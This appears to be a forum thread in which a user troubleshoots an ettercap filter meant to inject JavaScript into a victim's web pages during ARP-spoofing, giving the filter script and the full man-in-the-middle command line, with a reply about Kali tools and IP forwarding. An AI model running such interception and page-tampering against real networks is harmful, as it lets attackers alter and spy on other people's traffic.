
Does ettercap filter still work now?


kdlsw


I'm trying to perform a JavaScript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are from before 2016; I am not sure if this kind of attack still works now. Anyway, this is my filter script:

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Nothing!");
        msg("zapped Accept-Encoding!\n");
    }
}

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "<head>")) {
        replace("<head>", "<HEAD>");
        msg("Code injected");
    }
}

And I run it as

ettercap -T -q -i wlan0 -F test.ef -M arp:remote /192.168.0.1// /192.168.0.100//

test.ef is the compiled filter file.

When the victim opens any web page, I got a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the HTML source code on the victim side is untouched. The part I really don't understand is, if I remove the search condition for the second part,

if (ip.proto == TCP && tcp.dst == 80) {
    replace("<head>", "<HEAD>");
    msg("Code injected");
}

the "Code injected" message shows, but the HTML code on the web client is not changed, which means the problem is that the filter cannot find any named strings (in this case <head>) in the HTML file; it can only deal with the header (Accept-Encoding). Does anyone know a solution or workaround? Any suggestions will be appreciated, thanks.


2 hours ago, kdlsw said:

@digip Thanks, I will look into that. So many options for MITM these days. I just tested MITMF, another similar tool, which didn't work for me too well; hope this one is good. Thank you.

If you're using Kali, a lot of these tools should be installed, and if not, are in the repo and should all work once installed, dependencies as well. Often it's something simple though, like forgetting to add a switch or IP forward for a tool like mitm attacks.


10 hours ago, digip said:

If you're using Kali, a lot of these tools should be installed, and if not, are in the repo and should all work once installed, dependencies as well. Often it's something simple though, like forgetting to add a switch or IP forward for a tool like mitm attacks.

Thank you, this is helpful! I will try it!

